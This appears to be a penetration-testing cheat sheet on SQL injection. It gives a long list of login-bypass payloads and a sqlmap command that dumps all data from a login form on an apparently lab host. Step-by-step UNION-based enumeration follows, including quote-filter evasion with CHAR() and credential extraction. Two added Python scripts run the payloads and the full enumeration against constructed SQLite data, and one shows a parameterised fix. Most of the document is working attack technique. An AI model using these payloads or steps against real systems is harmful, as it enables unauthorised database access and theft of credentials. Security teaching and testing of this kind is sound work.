"
'or 1=1
"or 1=1
or 1=1--
'or 1=1--
"or 1=1--
or 1=1#
'or 1=1#
"or
1=1#
or 1=1/*
'or 1=1/*
"or 1=1/*
or 1=1;%00
```
‘or 1=1;%00
“or 1=1;%00
‘or’
”`
'or
'or'–
```
‘or–
or a=a
”`
'or a=a
"or a=a
or a=a–
'or a=a —
```
“or a=a–
or ‘a’=‘a’
”`
'or 'a'='a'
"or 'a'='a'
')or('a'='a'
")”a”=”a”
')'a'='a
'or”='
1' or '1'='1
' or 'abc'='abc';--
' or ' '=' ';--
' or 1=1;--
If any of these allow you to create an always true statement, or produce an error, it’s vulnerable.
```1' sleep(10) ;--```
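To show concretely what the two tells above look like, here is an added example that is not part of the original page: a login query built by string concatenation (the injectable pattern), the same query parameterised (the fix), and a probe that classifies a few of the payloads above as bypass, error or no effect. It uses an in-memory SQLite database as a stand-in for the target's MySQL backend, so MySQL-only syntax (`#` comments, `sleep()`) is left out; the table and credentials are constructed sample data.

```python
import sqlite3

# Constructed sample data (not from the page): an in-memory SQLite database stands in
# for the target's MySQL backend, so MySQL-only syntax such as '#' comments is not used.
def make_login_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO members VALUES (?, ?, ?)",
                    [(1, "admin", "S3cret!"), (2, "alice", "hunter2")])
    return con


def login_vulnerable(con, username: str, password: str):
    """Concatenates user input into the SQL string: the pattern the payload list targets.

    Returns ("ok", username_or_None) or ("error", message) so the caller can observe
    both tells: an always-true condition that logs in, or a database error.
    """
    sql = (f"SELECT username FROM members WHERE username='{username}' "
           f"AND password='{password}'")
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("ok", row[0] if row else None)


def login_safe(con, username: str, password: str):
    """Parameterised query: the input is bound as data and cannot change the statement."""
    row = con.execute("SELECT username FROM members WHERE username=? AND password=?",
                      (username, password)).fetchone()
    return row[0] if row else None


# A subset of the payloads listed above that are valid SQLite syntax, sent in the
# password field together with a known username.
PAYLOADS = ['"', "'", "' or 1=1--", "' or 'a'='a", "1' or '1'='1"]


def probe(con) -> dict:
    """Classify each payload: 'bypass' (logged in without the password), 'error' or 'no effect'."""
    results = {}
    for payload in PAYLOADS:
        status, value = login_vulnerable(con, "admin", payload)
        if status == "error":
            results[payload] = "error"
        else:
            results[payload] = "bypass" if value else "no effect"
    return results


if __name__ == "__main__":
    con = make_login_db()
    for payload, verdict in probe(con).items():
        print(f"{payload!r:18} -> {verdict}")
    # The parameterised version treats the same payload as a literal (wrong) password.
    print("safe login with payload:", login_safe(con, "admin", "' or 1=1--"))
```

The double-quote payload is classified as "no effect" because this query wraps the value in single quotes; that is why the list above carries both quote styles. Against the parameterised query every payload is just an incorrect password.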
## Exploit
The easy way out is if you can use sqlmap:
```bash
# Read the help (-hh prints the full option list)
sqlmap -hh
# Example: POST parameters, MySQL backend, every test enabled, dump all data
sqlmap -u "http://10.10.10.7/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump
```
Caveat: `--risk=3` turns on OR-based boolean payloads, which can modify or delete rows if the injectable statement is an UPDATE or DELETE, so keep the risk level low on anything that is not a throwaway target.
Otherwise, hopefully you can see some output from the injection test. If so, the following steps get you the data.

Inject `union select NULL,NULL,...`, adding one more NULL each time, until the query no longer errors. The number of NULLs at that point is the number of columns in the original SELECT (not the number of columns in the table). `order by n`, increasing n until it errors, gives the same count.

Let n be the number of columns.

Inject `union all select 1,2,...,n` with `@@version` substituted for one of the numbers.
Note: the column you picked may not be one the page renders. If nothing shows up and you get an error, the error may disclose which column is the problem (for example a type mismatch); if not, move `@@version` to the next position and retry until it appears. The positions whose numbers show up in the page are the ones you can read data through.

Inject `union all select 1,2,...,n` with `database()` in the column that renders.
Note: this is DBMS dependent. `@@version`, `database()` and the `information_schema` queries below are the MySQL forms.

Inject `union select 1,2,...,group_concat(table_name),...,n from information_schema.tables where table_schema=database()`

Any table or column name you inject as a string literal needs quotes; if quotes are filtered or escaped, convert the name to a `CHAR()` sequence (or a `0x...` hex literal) with waraxe's tool. Below, `CHAR(100,101,118,95,97,99,99,111,117,110,116,115)` spells `dev_accounts`.

Inject `union select 1,2,...,group_concat(column_name),...,n from information_schema.columns where table_name=CHAR(100,101,118,95,97,99,99,111,117,110,116,115)`

Inject `union select 1,2,...,group_concat(<column_name>,0x3a,<another_column_name>),...,n from <table_name>` (`0x3a` is a colon, so each row comes back as `value:value`).
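The whole procedure above, run end to end against a hypothetical vulnerable endpoint, as an added example that is not part of the original page. SQLite stands in for MySQL, so the MySQL-specific pieces are translated: `sqlite_version()` for `@@version`, `sqlite_master` for `information_schema.tables`, the stored `CREATE TABLE` text for `information_schema.columns`, and SQLite's `char()` for `CHAR()` (the `as_char` helper does what waraxe's tool does). The `product_page` function, its table names and the credentials are constructed for the example; it rejects quote characters and renders only two of the four selected columns, so both the quote-free `char()` encoding and the "which column reflects" step matter.

```python
import sqlite3

# Constructed sample data (not from the page): SQLite stands in for MySQL, with
# sqlite_master in place of information_schema and sqlite_version() in place of @@version.
def make_shop_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, description TEXT, price REAL)")
    con.execute("INSERT INTO products VALUES (1, 'Widget', 'A widget', 9.99)")
    con.execute("CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO dev_accounts VALUES (?, ?, ?)",
                    [(1, "admin", "S3cret!"), (2, "dev", "hunter2")])
    return con


def product_page(con, product_id: str) -> str:
    """Hypothetical vulnerable endpoint: a numeric id is concatenated unquoted into the query.

    Quote characters are rejected (as a filter or addslashes() would), which is why the
    CHAR() trick is needed later. Database errors are echoed to the page, and only two of
    the four selected columns are rendered, so not every column reflects injected data.
    """
    if "'" in product_id or '"' in product_id:
        return "Error: quotes are not allowed"
    sql = f"SELECT id, name, description, price FROM products WHERE id = {product_id}"
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"Error: {exc}"
    return "\n".join(f"{row[1]} | {row[2]}" for row in rows)


def as_char(text: str) -> str:
    """Encode a string literal as char(...) so it survives a quote filter (what waraxe's tool does)."""
    return "char(" + ",".join(str(ord(c)) for c in text) + ")"


def find_column_count(con, max_cols: int = 20):
    """Step 1: add NULLs to the UNION until the query stops erroring."""
    for n in range(1, max_cols + 1):
        page = product_page(con, "0 UNION SELECT " + ",".join(["NULL"] * n))
        if not page.startswith("Error"):
            return n
    return None


def find_reflected_columns(con, ncols: int) -> list:
    """Step 2: select the markers 1..n and see which of them the page actually renders."""
    page = product_page(con, "0 UNION SELECT " + ",".join(str(i) for i in range(1, ncols + 1)))
    tokens = page.replace("\n", " | ").split(" | ")
    return [i for i in range(1, ncols + 1) if str(i) in tokens]


def inject(con, col: int, ncols: int, expr: str, from_clause: str = "") -> str:
    """Put expr in the first rendered column, keep numeric markers elsewhere, read it back."""
    slots = [str(i) for i in range(1, ncols + 1)]
    slots[col - 1] = expr
    page = product_page(con, f"0 UNION SELECT {','.join(slots)} {from_clause}")
    return page.split(" | ")[0]


def enumerate_db(con) -> dict:
    """Steps 3 to 6 from the text, with the MySQL functions swapped for SQLite equivalents."""
    ncols = find_column_count(con)
    col = find_reflected_columns(con, ncols)[0]          # first column the page renders
    version = inject(con, col, ncols, "sqlite_version()")  # @@version on MySQL
    tables = inject(con, col, ncols, "group_concat(name)",
                    f"FROM sqlite_master WHERE type={as_char('table')}")  # information_schema.tables
    ddl = inject(con, col, ncols, "sql",
                 f"FROM sqlite_master WHERE name={as_char('dev_accounts')}")  # column names sit in the DDL
    creds = inject(con, col, ncols, "group_concat(username || char(58) || password)",
                   "FROM dev_accounts")                   # char(58) is 0x3a, a colon
    return {"columns": ncols, "reflected": col, "version": version,
            "tables": tables, "ddl": ddl, "creds": creds}


if __name__ == "__main__":
    con = make_shop_db()
    for key, value in enumerate_db(con).items():
        print(f"{key:10}: {value}")
```

Because the page is blind to the `id` and `price` columns, injecting into position 1 would return nothing; the marker step finds that positions 2 and 3 are the usable ones, which is the "may not be the vulnerable column" note above in code form.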